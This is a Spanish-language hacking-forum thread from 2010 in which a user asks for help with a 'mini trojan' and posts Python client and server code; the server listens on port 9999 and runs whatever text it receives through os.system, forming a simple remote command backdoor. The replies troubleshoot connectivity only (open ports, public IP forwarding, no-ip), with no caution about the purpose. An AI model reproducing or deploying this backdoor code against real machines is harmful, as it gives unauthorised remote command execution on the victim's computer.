elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Python] Ayuda con mini troyano
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Python] Ayuda con mini troyano  (Leído 5,569 veces)
.:Swik:.

Desconectado Desconectado

Mensajes: 32


Ver Perfil WWW
[Python] Ayuda con mini troyano
« en: 6 Junio 2010, 17:49 pm »

Hola a todos. Estoy intentanto hacer un minitroyano en python pero no se conecta. El caso es que si lo hago en local si me sale. Aqui os dejo el code:

Cliente.py

Código
  1. import socket
  2.  
  3.  
  4. Host = 'XXXXXXXXX'
  5. Port = 9999
  6. Connection = (Host, Port) #Juntamos el Host y el Puerto en una tupla
  7.  
  8. TCP_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Definimos el tipo de Socket, TCP
  9. TCP_Socket.connect(Connection) #Nos connectamos al Host y Puerto de la variable Connection
  10.  
  11. while 1:
  12.    comando = raw_input('>>> ')
  13.    TCP_Socket.send(comando)
  14.    if comando == 'exit':
  15.        break

server
Código
  1. import socket as sc
  2. from os import system as sys
  3.  
  4. server = sc.socket(sc.AF_INET, sc.SOCK_STREAM)
  5. server.bind(('', 9999))
  6. server.listen(1)
  7.  
  8. while 1:
  9.    socket_cliente, datos_cliente = server.accept()
  10.    seguir = True
  11.    while seguir:
  12.        peticion = socket_cliente.recv(XXXXXXX)
  13.        if peticion == 'exit':
  14.            socket_cliente.close()
  15.            seguir = False
  16.        else:
  17.            socket_cliente.send(sys('%s' % peticion))
  18.    break


En línea

Cygog

Desconectado Desconectado

Mensajes: 44


"Pedes in terra ad sidera visus"


Ver Perfil
Re: [Python] Ayuda con mini troyano
« Respuesta #1 en: 6 Junio 2010, 18:02 pm »

El code parece que esta bien.. QUizas el problema sea que la maquina remota posee el puerto " 9999 " cerrado..


En línea

.:Swik:.

Desconectado Desconectado

Mensajes: 32


Ver Perfil WWW
Re: [Python] Ayuda con mini troyano
« Respuesta #2 en: 6 Junio 2010, 18:20 pm »

Que va... Lo estoy probando con un amigo y tiene el puerto abierto...
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Python] Ayuda con mini troyano
« Respuesta #3 en: 7 Junio 2010, 22:09 pm »

Tienes la IP publica redirecionada a la interna? A mi estas cosas solo me funcionan bien si lo hago un no-ip y modificando la tabla de Hosts!

Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Mini Reto Python. Dibujar rombo ~ « 1 2 »
Ejercicios
Dnk! 14 28,965 Último mensaje 6 Marzo 2013, 09:59 am
por santiasecas
¿se puede hacer un troyano en python? « 1 2 »
Análisis y Diseño de Malware
0xDani 11 17,642 Último mensaje 19 Septiembre 2012, 00:16 am
por WarGhost
[Python] Troyano
Scripting
177600531 2 3,158 Último mensaje 22 Septiembre 2013, 06:20 am
por F3niX14
Codigo de troyano en python 3.8
Análisis y Diseño de Malware
mby 5 12,500 Último mensaje 15 Septiembre 2020, 12:12 pm
por OzX
Ayuda con Python (Troyano)
Análisis y Diseño de Malware
Zapallo420 2 11,266 Último mensaje 8 Diciembre 2023, 17:47 pm
por .xAk.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines